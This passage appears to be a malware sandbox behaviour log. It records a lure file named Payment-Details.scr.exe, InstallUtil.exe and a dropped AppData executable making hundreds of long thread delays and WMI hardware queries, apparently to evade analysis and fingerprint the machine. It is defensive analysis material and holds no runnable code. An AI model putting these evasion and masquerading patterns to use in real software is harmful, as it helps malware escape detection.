                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1776Thread sleep time: -96343s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1776Thread sleep time: -96234s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1776Thread sleep time: -96125s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1776Thread sleep time: -96015s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1776Thread sleep time: -95906s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1776Thread sleep time: -95797s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1776Thread sleep time: -95672s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1776Thread sleep time: -95562s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1776Thread sleep time: -95453s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1776Thread sleep time: -95343s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1776Thread sleep time: -95234s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1776Thread sleep time: -95125s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1776Thread sleep time: -95015s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1776Thread sleep time: -94906s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1776Thread sleep time: -94797s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1776Thread sleep time: -1799907s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1776Thread sleep time: -1799782s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\Desktop\Payment-Details.scr.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\Desktop\Payment-Details.scr.exeThread delayed: delay time: 100000Jump to behavior
                    Source: C:\Users\user\Desktop\Payment-Details.scr.exeThread delayed: delay time: 99858Jump to behavior
                    Source: C:\Users\user\Desktop\Payment-Details.scr.exeThread delayed: delay time: 99749Jump to behavior
                    Source: C:\Users\user\Desktop\Payment-Details.scr.exeThread delayed: delay time: 99640Jump to behavior
                    Source: C:\Users\user\Desktop\Payment-Details.scr.exeThread delayed: delay time: 99531Jump to behavior
                    Source: C:\Users\user\Desktop\Payment-Details.scr.exeThread delayed: delay time: 99421Jump to behavior
                    Source: C:\Users\user\Desktop\Payment-Details.scr.exeThread delayed: delay time: 99312Jump to behavior
                    Source: C:\Users\user\Desktop\Payment-Details.scr.exeThread delayed: delay time: 99203Jump to behavior
                    Source: C:\Users\user\Desktop\Payment-Details.scr.exeThread delayed: delay time: 99093Jump to behavior
                    Source: C:\Users\user\Desktop\Payment-Details.scr.exeThread delayed: delay time: 98984Jump to behavior
                    Source: C:\Users\user\Desktop\Payment-Details.scr.exeThread delayed: delay time: 98874Jump to behavior
                    Source: C:\Users\user\Desktop\Payment-Details.scr.exeThread delayed: delay time: 98765Jump to behavior
                    Source: C:\Users\user\Desktop\Payment-Details.scr.exeThread delayed: delay time: 98643Jump to behavior
                    Source: C:\Users\user\Desktop\Payment-Details.scr.exeThread delayed: delay time: 98515Jump to behavior
                    Source: C:\Users\user\Desktop\Payment-Details.scr.exeThread delayed: delay time: 98406Jump to behavior
                    Source: C:\Users\user\Desktop\Payment-Details.scr.exeThread delayed: delay time: 98278Jump to behavior
                    Source: C:\Users\user\Desktop\Payment-Details.scr.exeThread delayed: delay time: 98172Jump to behavior
                    Source: C:\Users\user\Desktop\Payment-Details.scr.exeThread delayed: delay time: 98025Jump to behavior
                    Source: C:\Users\user\Desktop\Payment-Details.scr.exeThread delayed: delay time: 97914Jump to behavior
                    Source: C:\Users\user\Desktop\Payment-Details.scr.exeThread delayed: delay time: 97796Jump to behavior
                    Source: C:\Users\user\Desktop\Payment-Details.scr.exeThread delayed: delay time: 97687Jump to behavior
                    Source: C:\Users\user\Desktop\Payment-Details.scr.exeThread delayed: delay time: 97578Jump to behavior
                    Source: C:\Users\user\Desktop\Payment-Details.scr.exeThread delayed: delay time: 97468Jump to behavior
                    Source: C:\Users\user\Desktop\Payment-Details.scr.exeThread delayed: delay time: 97359Jump to behavior
                    Source: C:\Users\user\Desktop\Payment-Details.scr.exeThread delayed: delay time: 97250Jump to behavior
                    Source: C:\Users\user\Desktop\Payment-Details.scr.exeThread delayed: delay time: 97140Jump to behavior
                    Source: C:\Users\user\Desktop\Payment-Details.scr.exeThread delayed: delay time: 97031Jump to behavior
                    Source: C:\Users\user\Desktop\Payment-Details.scr.exeThread delayed: delay time: 96922Jump to behavior
                    Source: C:\Users\user\Desktop\Payment-Details.scr.exeThread delayed: delay time: 96797Jump to behavior
                    Source: C:\Users\user\Desktop\Payment-Details.scr.exeThread delayed: delay time: 96687Jump to behavior
                    Source: C:\Users\user\Desktop\Payment-Details.scr.exeThread delayed: delay time: 96578Jump to behavior
                    Source: C:\Users\user\Desktop\Payment-Details.scr.exeThread delayed: delay time: 96468Jump to behavior
                    Source: C:\Users\user\Desktop\Payment-Details.scr.exeThread delayed: delay time: 96359Jump to behavior
                    Source: C:\Users\user\Desktop\Payment-Details.scr.exeThread delayed: delay time: 96249Jump to behavior
                    Source: C:\Users\user\Desktop\Payment-Details.scr.exeThread delayed: delay time: 96140Jump to behavior
                    Source: C:\Users\user\Desktop\Payment-Details.scr.exeThread delayed: delay time: 96031Jump to behavior
                    Source: C:\Users\user\Desktop\Payment-Details.scr.exeThread delayed: delay time: 95922Jump to behavior
                    Source: C:\Users\user\Desktop\Payment-Details.scr.exeThread delayed: delay time: 95797Jump to behavior
                    Source: C:\Users\user\Desktop\Payment-Details.scr.exeThread delayed: delay time: 95687Jump to behavior
                    Source: C:\Users\user\Desktop\Payment-Details.scr.exeThread delayed: delay time: 95578Jump to behavior
                    Source: C:\Users\user\Desktop\Payment-Details.scr.exeThread delayed: delay time: 95439Jump to behavior
                    Source: C:\Users\user\Desktop\Payment-Details.scr.exeThread delayed: delay time: 95312Jump to behavior
                    Source: C:\Users\user\Desktop\Payment-Details.scr.exeThread delayed: delay time: 95201Jump to behavior
                    Source: C:\Users\user\Desktop\Payment-Details.scr.exeThread delayed: delay time: 94844Jump to behavior
                    Source: C:\Users\user\Desktop\Payment-Details.scr.exeThread delayed: delay time: 94718Jump to behavior
                    Source: C:\Users\user\Desktop\Payment-Details.scr.exeThread delayed: delay time: 94609Jump to behavior
                    Source: C:\Users\user\Desktop\Payment-Details.scr.exeThread delayed: delay time: 94500Jump to behavior
                    Source: C:\Users\user\Desktop\Payment-Details.scr.exeThread delayed: delay time: 94390Jump to behavior
                    Source: C:\Users\user\Desktop\Payment-Details.scr.exeThread delayed: delay time: 94281Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 100000Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 99890Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 99780Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 99670Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 99561Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 99452Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 99342Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 99233Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 99124Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 99014Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 98905Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 98795Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 98686Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 98522Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 98353Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 98052Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 97921Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 97812Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 97702Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 97592Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 97483Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 97374Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 97265Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 97156Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 97046Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 96924Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 96796Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 96687Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 96578Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 96468Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 96359Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 96249Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 96139Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 96030Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 95877Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 95750Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 95604Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 95499Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 95259Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 95090Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 94982Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 94874Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 94764Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 94655Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 94546Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 94437Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 94327Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 94217Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 94108Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 93999Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 93888Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exeThread delayed: delay time: 100000Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exeThread delayed: delay time: 99890Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exeThread delayed: delay time: 99781Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exeThread delayed: delay time: 99672Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exeThread delayed: delay time: 99562Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exeThread delayed: delay time: 99453Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exeThread delayed: delay time: 99344Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exeThread delayed: delay time: 99234Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exeThread delayed: delay time: 99125Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exeThread delayed: delay time: 99015Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exeThread delayed: delay time: 98906Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exeThread delayed: delay time: 98797Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exeThread delayed: delay time: 98687Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exeThread delayed: delay time: 98578Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exeThread delayed: delay time: 98469Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exeThread delayed: delay time: 98359Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exeThread delayed: delay time: 98250Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exeThread delayed: delay time: 98141Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exeThread delayed: delay time: 98031Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exeThread delayed: delay time: 97922Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exeThread delayed: delay time: 97799Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exeThread delayed: delay time: 97686Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exeThread delayed: delay time: 97570Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exeThread delayed: delay time: 97266Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exeThread delayed: delay time: 97156Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exeThread delayed: delay time: 97047Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exeThread delayed: delay time: 96937Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exeThread delayed: delay time: 96828Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exeThread delayed: delay time: 96718Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exeThread delayed: delay time: 96609Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exeThread delayed: delay time: 96500Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exeThread delayed: delay time: 96390Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exeThread delayed: delay time: 96281Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exeThread delayed: delay time: 96172Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exeThread delayed: delay time: 96051Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exeThread delayed: delay time: 95937Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exeThread delayed: delay time: 95828Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exeThread delayed: delay time: 95718Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exeThread delayed: delay time: 95609Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exeThread delayed: delay time: 95500Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exeThread delayed: delay time: 95390Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exeThread delayed: delay time: 95281Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exeThread delayed: delay time: 95172Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exeThread delayed: delay time: 95061Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exeThread delayed: delay time: 94952Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exeThread delayed: delay time: 94809Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exeThread delayed: delay time: 94549Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exeThread delayed: delay time: 94329Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exeThread delayed: delay time: 94203Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exeThread delayed: delay time: 94094Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exeThread delayed: delay time: 93984Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exeThread delayed: delay time: 100000Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exeThread delayed: delay time: 99843Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exeThread delayed: delay time: 99718Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exeThread delayed: delay time: 99953Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exeThread delayed: delay time: 99844Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exeThread delayed: delay time: 99734Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exeThread delayed: delay time: 99624Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exeThread delayed: delay time: 99515Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exeThread delayed: delay time: 99406Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exeThread delayed: delay time: 99297Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exeThread delayed: delay time: 99185Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exeThread delayed: delay time: 99078Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exeThread delayed: delay time: 98963Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exeThread delayed: delay time: 98856Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exeThread delayed: delay time: 98750Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exeThread delayed: delay time: 98640Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exeThread delayed: delay time: 98531Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exeThread delayed: delay time: 98422Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exeThread delayed: delay time: 98308Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exeThread delayed: delay time: 98200Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exeThread delayed: delay time: 98094Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exeThread delayed: delay time: 97982Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exeThread delayed: delay time: 97871Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exeThread delayed: delay time: 97764Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exeThread delayed: delay time: 97651Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exeThread delayed: delay time: 97534Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exeThread delayed: delay time: 97406Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exeThread delayed: delay time: 97269Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exeThread delayed: delay time: 97140Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exeThread delayed: delay time: 97028Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exeThread delayed: delay time: 96922Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exeThread delayed: delay time: 96797Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exeThread delayed: delay time: 96683Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exeThread delayed: delay time: 96555Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exeThread delayed: delay time: 96453Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exeThread delayed: delay time: 96342Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exeThread delayed: delay time: 96234Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exeThread delayed: delay time: 96119Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exeThread delayed: delay time: 95989Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exeThread delayed: delay time: 95859Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exeThread delayed: delay time: 95750Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exeThread delayed: delay time: 95640Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exeThread delayed: delay time: 95531Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exeThread delayed: delay time: 95422Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exeThread delayed: delay time: 95312Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exeThread delayed: delay time: 95202Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exeThread delayed: delay time: 95093Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exeThread delayed: delay time: 94904Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exeThread delayed: delay time: 94679Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exeThread delayed: delay time: 94432Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 100000
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 99875
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 99766
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 99656
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 99546
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 99433
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 99316
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 98983
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 98875
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 98730
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 98605
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 98499
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 98391
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 98275
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 98156
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 98047
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 97937
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 97828
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 97719
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 97594
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 97485
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 97360
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 97235
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 97110
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 96985
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 96860
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 96735
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 96610
